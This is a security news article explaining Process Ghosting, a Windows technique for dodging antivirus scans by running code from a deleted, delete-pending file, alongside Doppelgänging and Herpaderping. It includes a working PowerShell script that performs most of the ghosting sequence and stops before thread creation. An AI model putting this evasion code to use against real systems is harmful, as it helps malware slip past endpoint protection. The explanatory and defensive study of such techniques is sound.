Process Ghosting is a new method for bypassing Windows protection

Elastic Security has described a new attack technique called Process Ghosting, which attackers could use to bypass security products and execute malicious code on Windows systems.

Process Ghosting is an executable-image tampering technique that lets an attacker put malicious code on disk in a way that makes it difficult for security products to scan or remove. More to the point, it lets a process be created and run from an executable file that has already been deleted.

The new method extends a family of well-known bypass techniques that includes Process Doppelgänging and Process Herpaderping.

Process Doppelgänging is related to Process Hollowing (in which a process is created in a suspended state and its image is replaced with the image the attacker wants to hide). Doppelgänging abuses NTFS transactions (TxF) to mask the loading of a modified executable: the payload is written to a file inside a transaction, an image section is created from it, and the transaction is rolled back. The malicious code is never committed to disk, so most popular security solutions overlook it.

Process Herpaderping hides the behaviour of a running process by overwriting the executable file on disk after the image has been mapped into memory (an image section has been created from it) but before the process is started from that section.

As the researchers explain, the bypass works because of the “gap between the creation of a process and notifying security solutions of its creation,” which gives malware authors time to tamper with the backing executable before security products scan it.

Process Ghosting goes one step further: it lets an attacker run an executable that has already been deleted. The technique relies on the fact that Windows only blocks attempts to modify or delete a mapped file once that file has been mapped into an image section. A file that was marked for deletion before the section was created is not protected.

“This means that it is possible to create a file, mark it for deletion, map it to an image section, close the file handle to complete the deletion, and then create a process from the now fileless section. This is Process Ghosting,” the researchers explained.

The researchers demonstrated the method against Windows Defender: Defender tries to open the malicious payload for scanning but fails because the file is in a delete-pending state, and its retries fail because by then the file has already been deleted. As a result, the payload (ghost.exe) runs unhindered.
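The sequence described above, reproduced as an added example written for this page (it is not Elastic's proof of concept and not part of the original article). It drives the Windows API from PowerShell via P/Invoke and deliberately stops after NtCreateProcessEx: no thread is started, so the payload never executes. What it makes visible are the three facts the technique depends on: a fresh open of a delete-pending file fails (the Defender scenario), the image section outlives the file, and a process object can still be created from that section. The class name Native, the constant values, the temporary path and the choice of cmd.exe as a stand-in payload are this example's own assumptions.

```powershell
# Added example, not Elastic's PoC. Stops before creating a thread: nothing runs.
# Needs Windows PowerShell 5.1+ (or PowerShell 7 on Windows) with Add-Type available.
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
using System.Text;
public static class Native {
    public const uint PAYLOAD_ACCESS = 0xC0110000;   // GENERIC_READ|GENERIC_WRITE|DELETE|SYNCHRONIZE
    public const uint GENERIC_READ   = 0x80000000;
    public const uint SHARE_ALL      = 7;            // FILE_SHARE_READ|WRITE|DELETE
    public const uint CREATE_ALWAYS  = 2, OPEN_EXISTING = 3, FILE_ATTRIBUTE_NORMAL = 0x80;
    public const int  FileDispositionInfo = 4;       // FILE_INFO_BY_HANDLE_CLASS value
    public const uint SECTION_ALL_ACCESS = 0xF001F, PAGE_READONLY = 2, SEC_IMAGE = 0x1000000;
    public const uint PROCESS_ALL_ACCESS = 0x1FFFFF;

    [StructLayout(LayoutKind.Sequential)]
    public struct FILE_DISPOSITION_INFO { public byte DeleteFile; }   // BOOLEAN, 1 byte

    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern IntPtr CreateFileW(string name, uint access, uint share, IntPtr sa,
                                            uint disposition, uint flags, IntPtr template);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool SetFileInformationByHandle(IntPtr h, int cls,
                                                         ref FILE_DISPOSITION_INFO info, int size);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool WriteFile(IntPtr h, byte[] buf, uint len, out uint written, IntPtr ov);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr h);
    [DllImport("kernel32.dll")]
    public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern bool QueryFullProcessImageNameW(IntPtr h, uint flags, StringBuilder name, ref uint size);
    [DllImport("ntdll.dll")]
    public static extern int NtCreateSection(out IntPtr section, uint access, IntPtr objAttr,
                                             IntPtr maxSize, uint pageProt, uint allocAttr, IntPtr file);
    [DllImport("ntdll.dll")]
    public static extern int NtCreateProcessEx(out IntPtr process, uint access, IntPtr objAttr,
                                               IntPtr parent, uint flags, IntPtr section,
                                               IntPtr debugPort, IntPtr token, uint reserved);
}
"@

$path    = Join-Path $env:TEMP 'ghost.exe'                      # assumed temp location
$payload = [IO.File]::ReadAllBytes("$env:windir\System32\cmd.exe")  # any valid PE; it is never executed

# 1. Create the file with DELETE access so we can mark it delete-pending ourselves.
$file = [Native]::CreateFileW($path, [Native]::PAYLOAD_ACCESS, [Native]::SHARE_ALL, [IntPtr]::Zero,
                              [Native]::CREATE_ALWAYS, [Native]::FILE_ATTRIBUTE_NORMAL, [IntPtr]::Zero)
if ($file.ToInt64() -eq -1) { throw "CreateFileW failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }

# 2. Mark it for deletion BEFORE any image section exists; the kernel does not object yet.
$disp = New-Object 'Native+FILE_DISPOSITION_INFO'; $disp.DeleteFile = 1
if (-not [Native]::SetFileInformationByHandle($file, [Native]::FileDispositionInfo, [ref]$disp, 1)) {
    throw "SetFileInformationByHandle failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
}

# 3. Write the payload through the handle we still hold.
$written = [uint32]0
if (-not [Native]::WriteFile($file, $payload, $payload.Length, [ref]$written, [IntPtr]::Zero)) { throw "WriteFile failed" }

# The scanner's view: a fresh open of a delete-pending file fails. STATUS_DELETE_PENDING
# surfaces as Win32 error 5 (ERROR_ACCESS_DENIED), which is what defeats the Defender scan.
$probe = [Native]::CreateFileW($path, [Native]::GENERIC_READ, [Native]::SHARE_ALL, [IntPtr]::Zero,
                               [Native]::OPEN_EXISTING, [Native]::FILE_ATTRIBUTE_NORMAL, [IntPtr]::Zero)
$probeErr = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
"open while delete-pending: handle={0} lastError={1}" -f $probe.ToInt64(), $probeErr
if ($probe.ToInt64() -ne -1) { [Native]::CloseHandle($probe) | Out-Null }

# 4. Map the delete-pending file into an image section. Had the deletion been requested
#    after this call, the file system would have refused it; in this order it is allowed.
$section = [IntPtr]::Zero
$status = [Native]::NtCreateSection([ref]$section, [Native]::SECTION_ALL_ACCESS, [IntPtr]::Zero, [IntPtr]::Zero,
                                    [Native]::PAGE_READONLY, [Native]::SEC_IMAGE, $file)
if ($status -ne 0) { throw ("NtCreateSection failed: 0x{0:X8}" -f $status) }

# 5. Close the last file handle: the deletion completes, the section survives.
[Native]::CloseHandle($file) | Out-Null
"file still on disk after close: {0}" -f (Test-Path -LiteralPath $path)

# 6. Build a process object from the now-fileless section (no thread, so it never runs).
$proc = [IntPtr]::Zero
$status = [Native]::NtCreateProcessEx([ref]$proc, [Native]::PROCESS_ALL_ACCESS, [IntPtr]::Zero,
                                      [Native]::GetCurrentProcess(), 0, $section, [IntPtr]::Zero, [IntPtr]::Zero, 0)
if ($status -ne 0) { throw ("NtCreateProcessEx failed: 0x{0:X8}" -f $status) }

$name = New-Object System.Text.StringBuilder 1024; $len = [uint32]1024
if ([Native]::QueryFullProcessImageNameW($proc, 0, $name, [ref]$len)) {
    "process object created; reported image path: {0} (exists on disk: {1})" -f $name.ToString(), (Test-Path -LiteralPath $name.ToString())
} else { "process object created; image path query failed (error $([Runtime.InteropServices.Marshal]::GetLastWin32Error()))" }

# Dropping the only handle to a thread-less process tears it down again.
[Native]::CloseHandle($proc) | Out-Null
[Native]::CloseHandle($section) | Out-Null
```

Run it in a fresh session (Add-Type will refuse to redefine Native in a session where it already exists). The order of steps 2 and 4 is the whole trick: the delete check that NTFS performs when a file is marked for deletion only fails if an image section already exists, so marking first and mapping second slips past it, and closing the handle then removes the file while the section, and any process built on it, live on. The example never calls NtCreateThreadEx or sets up process parameters, which is the work a real payload would need to actually execute; an endpoint product that monitors native process creation may still alert on the NtCreateProcessEx call, which is the behaviour a defender should want.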

The researchers reported their findings to the Microsoft Security Response Center (MSRC) in May 2021, but Microsoft replied that the issue does not meet its bar for servicing, i.e. it does not warrant a security update or mitigation guidance.
